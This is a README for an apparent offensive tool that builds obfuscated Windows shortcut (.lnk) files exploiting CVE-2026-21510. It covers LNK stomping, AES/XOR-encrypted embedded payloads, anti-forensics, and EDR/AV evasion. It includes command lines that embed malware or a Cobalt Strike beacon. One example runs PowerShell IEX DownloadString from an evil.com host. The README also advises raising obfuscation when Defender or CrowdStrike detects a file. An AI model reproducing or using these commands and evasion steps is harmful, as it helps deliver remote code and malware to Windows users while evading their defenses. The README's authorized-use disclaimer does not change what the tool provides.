
Generates obfuscated .lnk files exploiting CVE-2026-21510 with LNK stomping, encrypted payloads, and anti-forensics for authorized penetration testing and red team operations.
README EpSiLoNPoInTlnk CVE-2026-21510 - .LNK Generator Tool for generating .lnk files exploiting the CVE-2026-21510 vulnerability (Windows ShellLink Remote Code Execution). Designed for offensive security research, authorized penetration testing, and vulnerability analysis.
Legal Warning ⚠️ THIS TOOL IS INTENDED FOR LEGAL AND AUTHORIZED USE ONLY. Any unauthorized use against systems or networks would violate local and international laws (e.g., Computer Fraud and Abuse Act (CFAA), GDPR, Loi Godfrain in France). The author disclaims all responsibility for misuse. (See the Disclaimer below.)
Description This generator creates obfuscated .lnk files to exploit CVE-2026-21510, a vulnerability in Windows shortcut handling. It includes:
LNK Stomping (5 variants: dot, path_segment, relative, double_extension, unicode)
PropertyStore with random CLSIDs and PKEYs
KnownFolderDataBlock (random or targeted KnownFolderIDs)
EnvironmentVariableDataBlock (Unicode obfuscation, dynamic variables)
Obfuscation (Levels 1-5: TrackerDataBlock, ConsoleDataBlock, random blocks)
Embedded and encrypted payloads (AES-256-CBC + XOR)
Anti-Forensics (timestamps set to 0, file size set to 0, minimal metadata)
EDR/AV Bypass (legitimate processes, obfuscated PowerShell arguments)
Random variant generation (10+ unique variants to evade signatures)
Prerequisites System OS: Windows (to test the generated .lnk files) or Linux/macOS (for generation).
Python: ≥ 3.10. Dependencies: pip install pycryptodome
Recommended Tools Analysis: PEStudio, Detect It Easy (DIE)
Debugging: x64dbg, WinDbg
Testing: Isolated Windows virtual machine (e.g., Windows 10/11 on VirtualBox).
Installation Clone the repository: git clone https://github.com/EpSiLoNPoInT/EpSiLoNPoInTlnk.git cd EpSiLoNPoInTlnk Install dependencies: pip install -r requirements.txt (Optional) Create a virtual environment: python -m venv venv source venv/bin/activate # Linux/macOS venv\Scripts\activate # Windows
Usage
Basic Generation python lnkstomperpoint.py --target "C:\Windows\System32\cmd.exe" --args "/c calc.exe" --output exploit.lnk Generates a .lnk file exploiting CVE-2026-21510 to launch calc.exe.
Advanced Options Option Description Default value --target Target path (e.g., C:\Windows\System32\cmd.exe) C:\Windows\System32\cmd.exe --args Arguments for the target (e.g., /c whoami) /c calc.exe --output Output path for the .lnk file ./EpSiLoNPoInTlnk_[TIMESTAMP].lnk --working-dir Working directory C:\Windows\System32 --description Shortcut description Random string --unc Use a UNC path (?\C:...) False --lnk-stomping Enable LNK Stomping True --stomping-variant LNK Stomping variant (dot, path_segment, relative, double_extension, unicode, random) random --obfuscation Add useless ExtraData blocks True --obfuscation-level Obfuscation level (1-5) 5 --embed-payload Path to a file to embed (e.g., payload.bin) None --encrypt-payload Encrypt the payload (AES-256-CBC + XOR) True --anti-forensics Apply anti-forensics techniques True --randomize-clsid Randomize the CLSID in PropertyStore True --randomize-known-folder Randomize the KnownFolderID True --obfuscate-arguments Obfuscate arguments (PowerShell) True --generate-variants Generate N random variants 0 --debug Advanced debug mode (detailed logs) False
Examples
Example 1: Exploit with Embedded Payload
python lnkstomperpoint.py
--target "C:\Windows\System32\cmd.exe"
--args "/c payload.exe"
--embed-payload ./malware.bin
--output exploit_with_payload.lnk
--obfuscation-level 5
--anti-forensics
Generates a .lnk file with an encrypted (AES-256 + XOR) and obfuscated payload.
Example 2: Generating 10 Random Variants
python lnkstomperpoint.py
--target "C:\Windows\System32\powershell.exe"
--args "-nop -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://evil.com/shellcode.ps1')"
--generate-variants 10
--output-dir ./variants
Creates 10 unique variants to evade EDR/AV signatures.
Example 3: Minimalist Mode (for testing)
python lnkstomperpoint.py
--target "C:\Windows\System32\notepad.exe"
--obfuscation False
--anti-forensics False
--output minimal_exploit.lnk
Generates a non-obfuscated .lnk file (for analysis or debugging).
Technical Operation
ShellLink Header (0x4C fixed bytes + offsets): LinkCLSID: 00021401-0000-0000-C000-000000000046 (mandatory). LinkFlags: Configured to enable HasRelativePath, HasWorkingDir, IsUnicode, etc.
StringData: RelativePath: Target path (with LNK Stomping if enabled). WorkingDir: Working directory (e.g., C:\Windows\System32). Arguments: Obfuscated arguments (PowerShell, cmd, etc.).
ExtraData Blocks (critical order): PropertyStoreDataBlock: Contains PKEY_AppUserModel_ID (random CLSID). KnownFolderDataBlock: Points to a system folder (e.g., %SystemRoot%). EnvironmentVariableDataBlock: Forces variable expansion before the Mark-of-the-Web (MotW). Obfuscation Blocks (depending on obfuscation_level): TrackerDataBlock (Level 1) ConsoleDataBlock (Level 2) DarwinDataBlock, ShimDataBlock, etc. (Levels 3-5)
Embedded Payload (if --embed-payload): Encrypted with AES-256-CBC + XOR.
The payload is encrypted with AES-256-CBC (random 32-byte key, 16-byte IV).
An XOR layer is applied using the first 16 bytes of the AES key.
The key and IV are stored in a ShimDataBlock for later decryption.
Testing and Validation
The minimum file size.
The validity of the HeaderSize and CLSID.
The presence of the required LinkFlags.
The structure of the ExtraData blocks (PropertyStore, KnownFolder, etc.).
Execution (in an isolated environment): Double-click the .lnk file and observe the behavior. Use Process Monitor (ProcMon) to analyze system calls.
EDR/AV Detection: Test with tools like Windows Defender or CrowdStrike. If the .lnk file is detected, increase the obfuscation_level or disable certain options.
Use Cases Scenario Command Description Penetration Test --target "C:\Windows\System32\cmd.exe" --args "/c whoami" Checks whether the exploit works on a target machine. Red Team --embed-payload ./cobaltstrike_beacon.bin --obfuscation-level 5 Generates a .lnk file with an obfuscated Cobalt Strike payload. Research --generate-variants 50 --output-dir ./samples Creates 50 variants to test EDR detections. Debug --debug --obfuscation False Displays detailed logs to analyze the .lnk structure. Contributions Contributions are welcome! Here is how to contribute:
Fork the project.
Create a branch (git checkout -b feature/my-new-feature).
Commit your changes (git commit -m "Added feature X").
Push to the branch (git push origin feature/my-new-feature).
Open a Pull Request. Contribution Ideas:
Add new LNK Stomping variants.
Implement other encryption algorithms (e.g., ChaCha20).
Improve argument obfuscation (e.g., using JScript).
Add unit tests to validate .lnk structures.